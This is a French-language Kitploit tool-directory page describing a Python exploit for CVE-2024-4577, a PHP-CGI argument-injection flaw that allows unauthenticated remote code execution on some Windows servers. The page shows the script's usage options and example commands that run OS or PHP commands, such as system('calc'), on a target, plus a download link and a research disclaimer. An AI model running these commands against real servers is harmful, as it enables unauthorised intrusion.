Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-4577-PHP-CGI-argument-injection-RCE — Exploit Python pour CVE-2024-4577, injection d'arguments CGI PHP permettant une exécution de code à distance non authentifiée sur des serveurs Windows avec des locales spécifiques. | Kitploit
Outils/GitHubGitHub/jakabakos/cve-2024-4577-php-cgi-argument-injection-rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubjakabakos/cve-2024-4577-php-cgi-argument-injection-rce

CVE-2024-4577-PHP-CGI-argument-injection-RCE

Exploit Python pour CVE-2024-4577, injection d'arguments CGI PHP permettant une exécution de code à distance non authentifiée sur des serveurs Windows avec des locales spécifiques.

Voir le dépôt
23il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Injection d'arguments PHP CGI vers RCE (CVE-2024-4577) - code d'exploitation

La vulnérabilité CVE-2024-4577 dans PHP CGI s'est révélée être une faille de sécurité critique, permettant l'exécution de code à distance par injection d'arguments. Découverte dans plusieurs versions de PHP, cette vulnérabilité affecte principalement les serveurs fonctionnant dans des locales spécifiques (chinois traditionnel, chinois simplifié, japonais) sous Windows.

La faille exploite le mode CGI de PHP, contournant les mesures de sécurité précédentes et permettant à des attaquants non authentifiés d'exécuter du code arbitraire.

Utilisation

Script d'exploitation :

root@kitploit:~
usage: python exploit.py -t http://127.0.0.1 -c calc

options:
  -h, --help            show this help message and exit
  --target TARGET, -t TARGET
                        Target URL
  --code CODE, -c CODE  OS command to execute
  --php PHP, -p PHP     PHP command to execute

Exemple :

root@kitploit:~
python3 exploit.py 192.168.130.100 80 calc
python .\CVE-2024-4577.py -t http://127.0.0.1 -p "<?php system('calc') ?>"

kép

Avis de non-responsabilité

Ce script d'exploitation a été créé uniquement à des fins de recherche et de développement de techniques défensives efficaces. Il n'est pas destiné à être utilisé pour des activités malveillantes ou non autorisées. L'auteur et le propriétaire du script déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce logiciel. Sachez que les utilisateurs sont invités à utiliser ce logiciel de manière responsable et uniquement conformément aux lois et réglementations applicables. Utilisez-le de manière responsable.

Télécharger l’outil